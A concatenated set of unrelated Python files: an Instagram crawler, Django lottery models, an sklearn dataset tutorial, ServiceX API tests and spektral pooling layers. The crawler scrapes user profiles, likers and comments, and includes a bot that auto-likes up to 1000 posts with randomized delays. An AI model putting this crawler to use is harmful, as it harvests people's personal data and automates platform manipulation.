self.log_disable = False
except Exception:
self.log_disable = True
def cleanup(self, timestamp):
days = 86400 * 7
days_ago_log = "/tmp/%s-%s.log" % (Logging.PREFIX, timestamp - days)
for log in glob.glob("/tmp/instagram-crawler-*.log"):
if log < days_ago_log:
os.remove(log)
def log(self, msg):
if self.log_disable:
return
self.logger.write(msg + "\n")
self.logger.flush()
def __del__(self):
if self.log_disable:
return
self.logger.close()
class InsCrawler(Logging):
URL = "https://www.instagram.com"
RETRY_LIMIT = 10
def __init__(self, has_screen=False):
super(InsCrawler, self).__init__()
self.browser = Browser(has_screen)
self.page_height = 0
self.login()
def _dismiss_login_prompt(self):
ele_login = self.browser.find_one(".Ls00D .Szr5J")
if ele_login:
self.browser.js_click(ele_login)
def login(self):
browser = self.browser
url = "%s/accounts/login/" % InsCrawler.URL
browser.get(url)
u_input = browser.find_one('input[name="username"]')
u_input.send_keys(secret.username)
p_input = browser.find_one('input[name="password"]')
p_input.send_keys(secret.password)
login_btn = browser.find_one(".L3NKy")
self.browser.js_click(login_btn)
sleep(5)
@retry()
def check_login():
if browser.find_one('input[name="username"]'):
raise RetryException()
check_login()
def get_user_profile(self, username):
browser = self.browser
url = "%s/%s/" % (InsCrawler.URL, username)
browser.get(url)
name = browser.find_one(".rhpdm")
desc = browser.find_one(".-vDIg span")
photo = browser.find_one("._6q-tv")
statistics = [ele.text for ele in browser.find(".g47SY")]
post_num, follower_num, following_num = statistics
return {
"name": name.text,
"desc": desc.text if desc else None,
"photo_url": photo.get_attribute("src"),
"post_num": post_num,
"follower_num": follower_num,
"following_num": following_num,
}
def get_user_profile_from_script_shared_data(self, username):
browser = self.browser
url = "%s/%s/" % (InsCrawler.URL, username)
browser.get(url)
source = browser.driver.page_source
p = re.compile(r"window._sharedData = (?P<json>.*?);</script>", re.DOTALL)
json_data = re.search(p, source).group("json")
data = json.loads(json_data)
user_data = data["entry_data"]["ProfilePage"][0]["graphql"]["user"]
return {
"name": user_data["full_name"],
"desc": user_data["biography"],
"photo_url": user_data["profile_pic_url_hd"],
"post_num": user_data["edge_owner_to_timeline_media"]["count"],
"follower_num": user_data["edge_followed_by"]["count"],
"following_num": user_data["edge_follow"]["count"],
"website": user_data["external_url"],
}
def get_user_posts(self, username, number=None, detail=False):
user_profile = self.get_user_profile(username)
if not number:
number = instagram_int(user_profile["post_num"])
self._dismiss_login_prompt()
if detail:
return self._get_posts_full(number)
else:
return self._get_posts(number)
def get_latest_posts_by_tag(self, tag, num):
url = "%s/explore/tags/%s/" % (InsCrawler.URL, tag)
self.browser.get(url)
return self._get_posts(num)
def auto_like(self, tag="", maximum=1000):
self.login()
browser = self.browser
if tag:
url = "%s/explore/tags/%s/" % (InsCrawler.URL, tag)
else:
url = "%s/explore/" % (InsCrawler.URL)
self.browser.get(url)
ele_post = browser.find_one(".v1Nh3 a")
self.browser.js_click(ele_post)
for _ in range(maximum):
heart = browser.find_one(".dCJp8 .glyphsSpriteHeart__outline__24__grey_9")
if heart:
self.browser.js_click(heart)
randmized_sleep(2)
left_arrow = browser.find_one(".HBoOv")
if left_arrow:
self.browser.js_click(left_arrow)
randmized_sleep(2)
else:
break
def _get_posts_full(self, num):
@retry()
def check_next_post(cur_key):
ele_a_datetime = browser.find_one(".eo2As .c-Yi7")
# It takes time to load the post for some users with slow network
if ele_a_datetime is None:
raise RetryException()
next_key = ele_a_datetime.get_attribute("href")
if cur_key == next_key:
raise RetryException()
browser = self.browser
browser.implicitly_wait(1)
browser.scroll_down()
ele_post = browser.find_one(".v1Nh3 a")
self.browser.js_click(ele_post)
dict_posts = {}
pbar = tqdm(total=num)
pbar.set_description("fetching")
cur_key = None
all_posts = self._get_posts(num)
i = 1
# Fetching all posts
for _ in range(num):
dict_post = {}
# Fetching post detail
try:
if i < num:
check_next_post(all_posts[i]['key'])
i = i + 1
# Fetching datetime and url as key
ele_a_datetime = browser.find_one(".eo2As .c-Yi7")
cur_key = ele_a_datetime.get_attribute("href")
dict_post["key"] = cur_key
fetch_datetime(browser, dict_post)
fetch_imgs(browser, dict_post)
fetch_likes_plays(browser, dict_post)
fetch_likers(browser, dict_post)
fetch_caption(browser, dict_post)
fetch_comments(browser, dict_post)
except RetryException:
sys.stderr.write(
"\x1b[1;31m"
+ "Failed to fetch the post: "
+ (cur_key or 'URL not fetched')
+ "\x1b[0m"
+ "\n"
)
break
except Exception:
sys.stderr.write(
"\x1b[1;31m"
+ "Failed to fetch the post: "
+ (cur_key if isinstance(cur_key, str) else 'URL not fetched')
+ "\x1b[0m"
+ "\n"
)
traceback.print_exc()
self.log(json.dumps(dict_post, ensure_ascii=False))
dict_posts[browser.current_url] = dict_post
pbar.update(1)
pbar.close()
posts = list(dict_posts.values())
# if posts:
# posts.sort(key=lambda post: post["datetime"], reverse=True)
return posts
def _get_posts(self, num):
"""
To get posts, we have to click on the load more
button and make the browser call post api.
"""
TIMEOUT = 600
browser = self.browser
key_set = set()
posts = []
pre_post_num = 0
wait_time = 1
pbar = tqdm(total=num)
def start_fetching(pre_post_num, wait_time):
ele_posts = browser.find(".v1Nh3 a")
for ele in ele_posts:
key = ele.get_attribute("href")
if key not in key_set:
dict_post = {"key": key}
ele_img = browser.find_one(".KL4Bh img", ele)
dict_post["caption"] = ele_img.get_attribute("alt")
dict_post["img_url"] = ele_img.get_attribute("src")
fetch_details(browser, dict_post)
key_set.add(key)
posts.append(dict_post)
if len(posts) == num:
break
if pre_post_num == len(posts):
pbar.set_description("Wait for %s sec" % (wait_time))
sleep(wait_time)
pbar.set_description("fetching")
wait_time *= 2
browser.scroll_up(300)
else:
wait_time = 1
pre_post_num = len(posts)
browser.scroll_down()
return pre_post_num, wait_time
pbar.set_description("fetching")
while len(posts) < num and wait_time < TIMEOUT:
post_num, wait_time = start_fetching(pre_post_num, wait_time)
pbar.update(post_num - pre_post_num)
pre_post_num = post_num
loading = browser.find_one(".W1Bne")
if not loading and wait_time > TIMEOUT / 2:
break
pbar.close()
print("Done. Fetched %s posts." % (min(len(posts), num)))
return posts[:num]
|
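The while-loop in _get_posts above applies an exponential backoff: whenever a scroll yields no new posts, the wait time doubles until it exceeds the timeout, and any progress resets it to one second. Below is a stripped-down, framework-free sketch of the same pattern; the fetch_new callable is a stand-in for the Selenium scraping:

import time

def poll_with_backoff(fetch_new, target, timeout=600):
    """Call fetch_new() until `target` items are collected or the wait exceeds timeout.

    fetch_new() is assumed to return a list of newly found items (possibly empty).
    """
    items, wait = [], 1
    while len(items) < target and wait < timeout:
        new = fetch_new()
        if new:
            items.extend(new)
            wait = 1            # progress made: reset the backoff
        else:
            time.sleep(wait)    # stalled: wait, then retry with a longer delay
            wait *= 2
    return items[:target]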
py | b4159688350829969656843d4018ec7ec62a9efb | ##############################################################################################################
#
# by Claire Harrison ([email protected])
#
# Works with django 1.9.1 and python 2.7.11 or django 1.9.2 and python 3.5.1 (and probably others)
#
##############################################################################################################
from __future__ import unicode_literals
from six import with_metaclass
import decimal
from django.utils.encoding import python_2_unicode_compatible
from django.db.models.base import ModelBase
from django.db import models, IntegrityError
from django.core import exceptions
from django.contrib.auth.hashers import make_password
@python_2_unicode_compatible
class LotteryNumberSet(list):
'''Custom data type to hold a set of lottery numbers'''
def __str__(self):
return ','.join(str(i) for i in self) # convert numbers to a string
def __init__(self, list=[]):
return super(LotteryNumberSet, self).__init__(list)
class LotteryNumberField(models.CommaSeparatedIntegerField):
'''Field to hold a LotteryNumberSet and validate it according to the rules which apply to the type of lottery to which it relates'''
def __init__(self, *args, **kw):
kw['max_length'] = 30
super(LotteryNumberField, self).__init__(*args, **kw)
def deconstruct(self):
name, path, args, kwargs = super(LotteryNumberField, self).deconstruct()
del kwargs["max_length"]
return name, path, args, kwargs
def from_db_value(self, value, expression, connection, context):
return self.to_python(value)
@staticmethod
def to_python(value):
if not value: return LotteryNumberSet([])
if isinstance(value, (list, tuple)): return LotteryNumberSet(value)
else: return LotteryNumberSet(filter(None, (int(i) if i else None for i in value.strip('][').split(','))))
def get_prep_value(self, value):
if not value:
if self.default == None: raise IntegrityError
else: return ''
else: return ','.join(str(i) for i in sorted(value)) # arrange numbers in ascending order
def validate(self, value, model_instance):
'''Validate the value according to the rules for the type of lottery this field is associated with'''
if not self.editable: return # Skip validation for non-editable fields.
if value is None and not self.null: raise exceptions.ValidationError(self.error_messages['null'], code='null')
if not self.blank and value in self.empty_values: raise exceptions.ValidationError(self.error_messages['blank'], code='blank')
v = LotteryNumberField.to_python(value)
if hasattr(model_instance, 'lotterytype'): model_instance.lotterytype.checkNumbers(v) # check numbers before saving
else: model_instance.draw.lotterytype.checkNumbers(v)
class LotteryTypeMeta(ModelBase):
'''Metaclass to collect the names of subclasses of LotteryType as they are created.
(They are used later in the method LotteryType.sub to find the actual class of LotteryType objects.)
As written it will only work with direct subclasses of LotteryType'''
def __new__(cls, name, parents, dct):
'''When creating a new class, if it is a subclass of LotteryType, lowercase its name and
store it in the LotteryType.subclasses class variable.'''
if name == 'LotteryType':
if not 'subclasses' in dct: dct['subclasses'] = set()
elif 'LotteryType' in [p.__name__ for p in parents]: parents[0].subclasses.add(name.lower())
return super(LotteryTypeMeta, cls).__new__(cls, name, parents, dct)
@python_2_unicode_compatible
class LotteryType(with_metaclass(LotteryTypeMeta, models.Model)):
'''Abstract superclass for different lottery types.
A series of lottery draws with the same rules, and the possibility of a rollover if no prize is allocated'''
name = models.CharField(max_length=30)
number_of_numbers = models.PositiveIntegerField()
max_val = models.PositiveIntegerField()
rollover = models.DecimalField(decimal_places=2, default=decimal.Decimal('0.00'), max_digits=20)
min_matches = models.PositiveIntegerField(default=1)
@property
def sub(self):
'''Return the current object downcast to an object of its actual type (which is a subclass of LotteryType)'''
for name in self.subclasses:
if hasattr(self, name): return getattr(self, name)
def __str__(self): return 'Lottery Type {}'.format(self.name)
def checkEntry(self, e):
'''Check that an entry is valid.
To be valid its numbers must be valid '''
return self.checkNumbers(e.entry)
def checkNumbers(self, n):
'''Check that a list of values is valid.
To be valid it must have the correct number of integers which must be in the range 1 to max_val (inclusive).
And the same number should not occur more than once.
A ValueError is raised if these conditions are not met.'''
seen = []
if len(n) != self.number_of_numbers: raise ValueError("Incorrect number of numbers")
for x in n:
if x < 1 or x > self.max_val: raise ValueError("Number out of range")
if x in seen: raise ValueError("Duplicate Value")
seen.append(x)
return True
def checkMatches(self, draw, entry):
'''Find how many numbers in the given entry are also in the winning_combo'''
return len([n for n in entry.entry if n in draw.winning_combo])
def findWinners(self, draw):
return self.sub._findWinners(draw)
def allocatePrize(self, draw):
return self.sub._allocatePrize(draw)
# The following two static methods exist to be extended by subclasses
@staticmethod
def _findWinners(draw):
'''Find the winners of this draw, and how many matches they have.
Store the results in the object, and return them.
The rule is that the punter(s) with the largest number of matches win(s) -- as long as they have at least the minimum number of matches.
If more than one punter has the winning number of matches, they share the prize between them.'''
draw.maxMatches, draw.winners = 0, set()
for e in draw.entry_set.all():
matches = draw._checkMatches(e)
if matches > draw.maxMatches:
draw.maxMatches = matches
if matches >= draw.lotterytype.min_matches: # cant win with too few matches
draw.winners = {e}
elif matches < draw.lotterytype.min_matches: continue
elif matches == draw.maxMatches:
draw.winners.add(e)
return draw.maxMatches, draw.winners
@staticmethod
def _allocatePrize(draw):
'''Divide the prize money (including any rollover) among the winners, if there are any winners.
Otherwise add the prize money to the rollover.'''
if not draw.winners:
draw.lotterytype.rollover += draw.prize
return None
amount = (draw.prize + draw.lotterytype.rollover) / len(draw.winners)
draw.lotterytype.rollover = decimal.Decimal('0.00')
draw.lotterytype.save()
for w in draw.winners: Win(entry=w, prize=amount).save()
#class Meta:
# abstract = True # dont tell django this is an abstract class, or we wont be able to use it in foreign keys
class SimpleLottery(LotteryType):
'''A type of lottery which has a prize for the highest number of matching numbers'''
class Meta:
verbose_name = 'Simple Lottery Type'
verbose_name_plural = 'Simple Lottery Types'
class MoreComplexLottery(LotteryType):
'''A type of lottery which has a prize for the highest number of matching numbers.
And also a prize for any entry which acheives a minimum number of matches.'''
# additional field required to store details the extra prizes to be allocated
spotprize_nummatches = models.PositiveIntegerField()
spotprize_value = models.DecimalField(decimal_places=2, max_digits=20)
@staticmethod
def _findWinners(draw):
# the main prize
draw.maxMatches, draw.winners = super(MoreComplexLottery, draw.lotterytype.sub)._findWinners(draw)
# the additional prizes
draw.spotprize_winners = set()
if draw.lotterytype.sub.spotprize_nummatches < draw.maxMatches or not draw.winners:
for e in [e for e in draw.entry_set.all() if not draw.winners or e not in draw.winners]:
if draw._checkMatches(e) >= draw.lotterytype.sub.spotprize_nummatches:
draw.spotprize_winners.add(e)
return draw.maxMatches, draw.winners
@staticmethod
def _allocatePrize(draw):
# the main prize
super(MoreComplexLottery, draw.lotterytype.sub)._allocatePrize(draw)
# the additional prizes
for w in draw.spotprize_winners: Win(entry=w, prize=draw.lotterytype.sub.spotprize_value, wintype=Win.SPOTPRIZE).save()
class Meta:
verbose_name = 'More Complex Lottery Type'
verbose_name_plural = 'More Complex Lottery Types'
@python_2_unicode_compatible
class Draw(models.Model):
'''A single draw which has a specific draw date, and will eventually have a winning combination'''
lotterytype = models.ForeignKey(LotteryType)
drawdate = models.DateTimeField()
prize = models.DecimalField(decimal_places=2, max_digits=20)
#_winning_combo = LotteryNumberField(db_column='winning_combo', blank=True)
winning_combo = LotteryNumberField(blank=True) # use this field for in coding
def __str__(self): return '{}, with draw on date {}'.format(self.lotterytype, self.drawdate)
def _checkMatches(self, entry):
return self.lotterytype.checkMatches(self, entry)
def makeDraw(self, *numbers):
'''Store the winning numbers, find the winners and allocate the prize'''
if self.winning_combo: raise RuntimeError("Draw has already been made")
self.winning_combo = numbers
self.save()
self.lotterytype.findWinners(self)
self.lotterytype.allocatePrize(self)
def save(self, *args, **kwargs):
'''validate and save the model'''
self.full_clean()
super(Draw, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Punter(models.Model):
'''An individual or syndicate who enters one or more lotteries'''
name = models.CharField(max_length=100)
address = models.TextField(null=True)
email = models.EmailField(unique=True)
password = models.CharField(max_length=100)
def __str__(self): return self.name
def save(self,*a,**kw):
self.password = make_password(self.password)
super(Punter,self).save(*a,**kw)
@python_2_unicode_compatible
class Entry(models.Model):
'''An entry to a draw made by a punter'''
punter = models.ForeignKey(Punter)
draw = models.ForeignKey(Draw)
time = models.DateTimeField(auto_now_add=True, blank=True)
#_entry = LotteryNumberField(db_column='entry', default=None) # this field for db storage (default=None prevents blank field being automatically stored)
entry = LotteryNumberField(blank=None) # use this field in coding
@property
def won(self): return True if self.win else False
def __str__(self): return 'Entry by {} for draw {}'.format(self.punter, self.draw)
class Meta:
verbose_name_plural = "Entries"
unique_together = (('punter', 'draw')) # dont allow punter to enter draw more than once
def save(self, *args, **kwargs):
'''validate and save the model'''
self.full_clean()
super(Entry, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Win(models.Model):
'''The award of a prize for a lottery entry'''
entry = models.OneToOneField(Entry)
prize = models.DecimalField(decimal_places=2, max_digits=20)
MAIN = 'M'
SPOTPRIZE = 'S'
wintypes = ((MAIN, 'main'), (SPOTPRIZE, 'spotprize'))
wintype = models.CharField(max_length=1, choices=wintypes, blank=False, default=MAIN)
def __str__(self): return 'win of {} for {}'.format(self.prize, self.entry)
|
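The LotteryTypeMeta/sub pair above depends on the metaclass recording each subclass name so that sub can later probe the lowercased attribute Django adds for multi-table inheritance. A minimal, Django-free sketch of the registration half, with invented class names for illustration:

class RegistryMeta(type):
    """Record lowercased subclass names on the base class, as LotteryTypeMeta does."""
    def __new__(cls, name, bases, dct):
        if not bases:                  # creating the base class itself
            dct.setdefault('subclasses', set())
        new_cls = super().__new__(cls, name, bases, dct)
        if bases:                      # creating a subclass: register it
            bases[0].subclasses.add(name.lower())
        return new_cls

class Lottery(metaclass=RegistryMeta):
    pass

class SimpleLottery(Lottery):
    pass

class BonusLottery(Lottery):
    pass

print(Lottery.subclasses)   # {'simplelottery', 'bonuslottery'}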
py | b41596ffac0e87b905904e85259c987e51b2d7de | from sklearn import datasets
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# TODO 2
digits = datasets.load_digits()
print(digits.target.shape)
print(digits.data.shape)
print(digits.images.shape)
plt.imshow(digits.images[0], cmap='gray_r')
plt.show()
elements = 5
fig, axs = plt.subplots(len(digits.target_names), elements)
for nr in range(len(digits.target_names)):
for i in range(elements):
axs[nr][i].imshow(digits.images[digits.target == nr][i], cmap='gray_r')
axs[nr][i].axis('off')
plt.show()
# TODO 3
X, y = digits.data, digits.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
# TODO 4
faces = datasets.fetch_olivetti_faces()
print(faces.target.shape)
print(faces.data.shape)
print(faces.images.shape)
plt.imshow(faces.images[0], cmap='gray')
plt.show()
X, y = faces.data, faces.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
print(X_train.shape, X_test.shape)
print(y_train.shape, y_test.shape)
|
py | b4159715f38d36f570013ac658fdbe2ee62310b2 | # Copyright (c) 2019, IRIS-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
from unittest.mock import call
from flask import current_app
from servicex import LookupResultProcessor
from servicex.models import TransformRequest
from tests.resource_test_base import ResourceTestBase
class TestSubmitTransformationRequest(ResourceTestBase):
@staticmethod
def _generate_transformation_request(**kwargs):
request = {
'did': 'rucio://123-45-678',
'columns': "e.e, e.p",
'result-destination': 'kafka',
'kafka': {'broker': 'ssl.hep.kafka:12332'},
'chunk-size': 500,
'workers': 10
}
request.update(kwargs)
return request
@staticmethod
def _generate_transformation_request_xAOD_root_file():
return {
'did': '123-45-678',
'selection': "test-string",
'image': 'ssl-hep/func_adl:latest',
'result-destination': 'object-store',
'result-format': 'root-file',
'workers': 10
}
def test_submit_transformation_request_bad(self, client):
resp = client.post('/servicex/transformation', json={'timestamp': '20190101'})
assert resp.status_code == 400
def test_submit_transformation_bad_result_dest(self, client):
request = self._generate_transformation_request()
request['result-destination'] = 'foo'
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_bad_wrong_dest_for_format(self, client):
request = self._generate_transformation_request()
request['result-format'] = 'root-file'
request['result-destination'] = 'minio'
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_bad_result_format(self, client):
request = self._generate_transformation_request()
request['result-format'] = 'foo'
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_bad_workflow(self, client):
request = self._generate_transformation_request(columns=None, selection=None)
r = client.post('/servicex/transformation', json=request)
assert r.status_code == 400
def test_submit_transformation_bad_did_scheme(self, client):
request = self._generate_transformation_request(did='foobar://my-did')
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
assert "DID scheme is not supported" in response.json["message"]
def test_submit_transformation_request_throws_exception(
self, mocker, mock_rabbit_adaptor
):
mock_rabbit_adaptor.setup_queue = mocker.Mock(side_effect=Exception('Test'))
client = self._test_client(rabbit_adaptor=mock_rabbit_adaptor)
response = client.post('/servicex/transformation',
json=self._generate_transformation_request())
assert response.status_code == 503
assert response.json == {"message": "Error setting up transformer queues"}
def test_submit_transformation(self, mock_rabbit_adaptor, mock_app_version):
client = self._test_client(rabbit_adaptor=mock_rabbit_adaptor)
request = self._generate_transformation_request()
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.did == 'rucio://123-45-678'
assert saved_obj.finish_time is None
assert saved_obj.request_id == request_id
assert saved_obj.title is None
assert saved_obj.columns == "e.e, e.p"
assert saved_obj.image == current_app.config["TRANSFORMER_DEFAULT_IMAGE"]
assert saved_obj.chunk_size == 500
assert saved_obj.workers == 10
assert saved_obj.result_destination == 'kafka'
assert saved_obj.kafka_broker == "ssl.hep.kafka:12332"
assert saved_obj.app_version == "3.14.15"
assert saved_obj.code_gen_image == 'sslhep/servicex_code_gen_func_adl_xaod:develop'
setup_queue_calls = [call(request_id), call(request_id+"_errors")]
mock_rabbit_adaptor.setup_queue.assert_has_calls(setup_queue_calls)
mock_rabbit_adaptor.setup_exchange.assert_has_calls([
call('transformation_requests'),
call('transformation_failures')
])
bind_to_exchange_calls = [
call(exchange="transformation_requests", queue=request_id),
call(exchange="transformation_failures", queue=request_id+"_errors"),
]
assert mock_rabbit_adaptor.bind_queue_to_exchange.call_args_list == bind_to_exchange_calls
service_endpoint = \
"http://cern.analysis.ch:5000/servicex/internal/transformation/" + \
request_id
publish_body = {
"request_id": request_id,
"did": "123-45-678",
"service-endpoint": service_endpoint
}
mock_rabbit_adaptor.basic_publish.assert_called_with(
exchange='',
routing_key='rucio_did_requests',
body=json.dumps(publish_body)
)
def test_submit_transformation_default_scheme(self, mock_rabbit_adaptor, mock_app_version):
client = self._test_client(rabbit_adaptor=mock_rabbit_adaptor)
request = self._generate_transformation_request()
request['did'] = '123-45-678' # No scheme
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.did == 'rucio://123-45-678'
service_endpoint = \
"http://cern.analysis.ch:5000/servicex/internal/transformation/" + \
request_id
publish_body = {
"request_id": request_id,
"did": "123-45-678",
"service-endpoint": service_endpoint
}
mock_rabbit_adaptor.basic_publish.assert_called_with(
exchange='',
routing_key='rucio_did_requests',
body=json.dumps(publish_body)
)
def test_submit_transformation_with_root_file(
self, mocker, mock_rabbit_adaptor, mock_code_gen_service, mock_app_version
):
mock_code_gen_service.generate_code_for_selection.return_value = 'my-cm'
request = self._generate_transformation_request_xAOD_root_file()
client = self._test_client(
rabbit_adaptor=mock_rabbit_adaptor, code_gen_service=mock_code_gen_service
)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.did == 'rucio://123-45-678'
assert saved_obj.request_id == request_id
assert saved_obj.columns is None
assert saved_obj.selection == 'test-string'
assert saved_obj.image == 'ssl-hep/func_adl:latest'
assert saved_obj.chunk_size is None
assert saved_obj.workers == 10
assert saved_obj.result_destination == 'object-store'
assert saved_obj.result_format == 'root-file'
assert saved_obj.generated_code_cm == 'my-cm'
assert saved_obj.app_version == "3.14.15"
assert saved_obj.code_gen_image == 'sslhep/servicex_code_gen_func_adl_xaod:develop'
setup_queue_calls = [call(request_id), call(request_id+"_errors")]
mock_rabbit_adaptor.setup_queue.assert_has_calls(setup_queue_calls)
bind_to_exchange_calls = [
call(exchange="transformation_requests", queue=request_id),
call(exchange="transformation_failures", queue=request_id+"_errors"),
]
assert mock_rabbit_adaptor.bind_queue_to_exchange.call_args_list == bind_to_exchange_calls
service_endpoint = \
"http://cern.analysis.ch:5000/servicex/internal/transformation/" + \
request_id
publish_body = {
"request_id": request_id,
"did": "123-45-678",
"service-endpoint": service_endpoint
}
mock_rabbit_adaptor.basic_publish.assert_called_with(
exchange='',
routing_key='rucio_did_requests',
body=json.dumps(publish_body)
)
def test_submit_transformation_file_list(self, mocker):
request = self._generate_transformation_request()
request['did'] = None
request['file-list'] = ["file1", "file2"]
mock_processor = mocker.MagicMock(LookupResultProcessor)
client = self._test_client(lookup_result_processor=mock_processor)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
mock_processor.publish_preflight_request.assert_called_once()
preflight_call = mock_processor.publish_preflight_request.call_args
assert preflight_call[0][1] == 'file1'
mock_processor.add_file_to_dataset.assert_called()
add_file_calls = mock_processor.add_file_to_dataset.call_args_list
assert mock_processor.add_file_to_dataset.call_count == 2
assert add_file_calls[0][0][1].file_path == 'file1'
assert add_file_calls[1][0][1].file_path == 'file2'
mock_processor.report_fileset_complete.assert_called()
fileset_complete_call = mock_processor.report_fileset_complete.call_args
assert fileset_complete_call[1]['num_files'] == 2
def test_submit_transformation_request_bad_image(
self, mocker, mock_docker_repo_adapter
):
mock_docker_repo_adapter.check_image_exists = mocker.Mock(return_value=False)
client = self._test_client(docker_repo_adapter=mock_docker_repo_adapter)
request = self._generate_transformation_request()
request["image"] = "ssl-hep/foo:latest"
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
assert response.json == {"message": "Requested transformer docker image doesn't exist: " + request["image"]} # noqa: E501
def test_submit_transformation_request_no_docker_check(
self, mocker, mock_docker_repo_adapter
):
mock_docker_repo_adapter.check_image_exists = mocker.Mock(return_value=False)
client = self._test_client(
extra_config={'TRANSFORMER_VALIDATE_DOCKER_IMAGE': False},
docker_repo_adapter=mock_docker_repo_adapter,
)
request = self._generate_transformation_request()
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
mock_docker_repo_adapter.check_image_exists.assert_not_called()
def test_submit_transformation_with_root_file_selection_error(
self, mocker, mock_code_gen_service
):
mock_code_gen_service.generate_code_for_selection = \
mocker.Mock(side_effect=ValueError('This is the error message'))
request = self._generate_transformation_request_xAOD_root_file()
client = self._test_client(code_gen_service=mock_code_gen_service)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_missing_dataset_source(self, client):
request = self._generate_transformation_request()
request['did'] = None
request['file-list'] = []
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_duplicate_dataset_source(self, client):
request = self._generate_transformation_request()
request['did'] = "This did"
request['file-list'] = ["file1.root", "file2.root"]
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 400
def test_submit_transformation_with_object_store(self, mocker):
from servicex import ObjectStoreManager
local_config = {
'OBJECT_STORE_ENABLED': True,
'MINIO_URL': 'localhost:9000',
'MINIO_ACCESS_KEY': 'miniouser',
'MINIO_SECRET_KEY': 'leftfoot1'
}
mock_object_store = mocker.MagicMock(ObjectStoreManager)
client = self._test_client(
extra_config=local_config,
object_store=mock_object_store
)
request = self._generate_transformation_request(**{
"result-destination": "object-store",
"result-format": "parquet"
})
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
mock_object_store.create_bucket.assert_called_with(request_id)
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.result_destination == 'object-store'
assert saved_obj.result_format == 'parquet'
def test_submit_transformation_auth_enabled(
self, mock_jwt_extended, mock_requesting_user
):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
response = client.post('/servicex/transformation',
json=self._generate_transformation_request())
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.submitted_by == mock_requesting_user.id
def test_submit_transformation_with_title(self, client):
title = "Things Fall Apart"
request = self._generate_transformation_request(title=title)
response = client.post('/servicex/transformation', json=request)
assert response.status_code == 200
request_id = response.json['request_id']
with client.application.app_context():
saved_obj = TransformRequest.return_request(request_id)
assert saved_obj
assert saved_obj.title == title
|
py | b415984ebbdc279e144710cca361813233a9a2a6 | import tensorflow as tf
from tensorflow.keras import backend as K, initializers, regularizers, constraints
from tensorflow.keras.layers import Layer, Dense
from spektral.layers import ops
class GlobalPool(Layer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.supports_masking = True
self.pooling_op = None
self.batch_pooling_op = None
def build(self, input_shape):
if isinstance(input_shape, list) and len(input_shape) == 2:
self.data_mode = 'disjoint'
else:
if len(input_shape) == 2:
self.data_mode = 'single'
else:
self.data_mode = 'batch'
super().build(input_shape)
def call(self, inputs):
if self.data_mode == 'disjoint':
X = inputs[0]
I = inputs[1]
if K.ndim(I) == 2:
I = I[:, 0]
else:
X = inputs
if self.data_mode == 'disjoint':
return self.pooling_op(X, I)
else:
return self.batch_pooling_op(X, axis=-2, keepdims=(self.data_mode == 'single'))
def compute_output_shape(self, input_shape):
if self.data_mode == 'single':
return (1,) + input_shape[-1:]
elif self.data_mode == 'batch':
return input_shape[:-2] + input_shape[-1:]
else:
# Input shape is a list of shapes for X and I
return input_shape[0]
def get_config(self):
return super().get_config()
class GlobalSumPool(GlobalPool):
"""
A global sum pooling layer. Pools a graph by computing the sum of its node
features.
**Mode**: single, disjoint, mixed, batch.
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
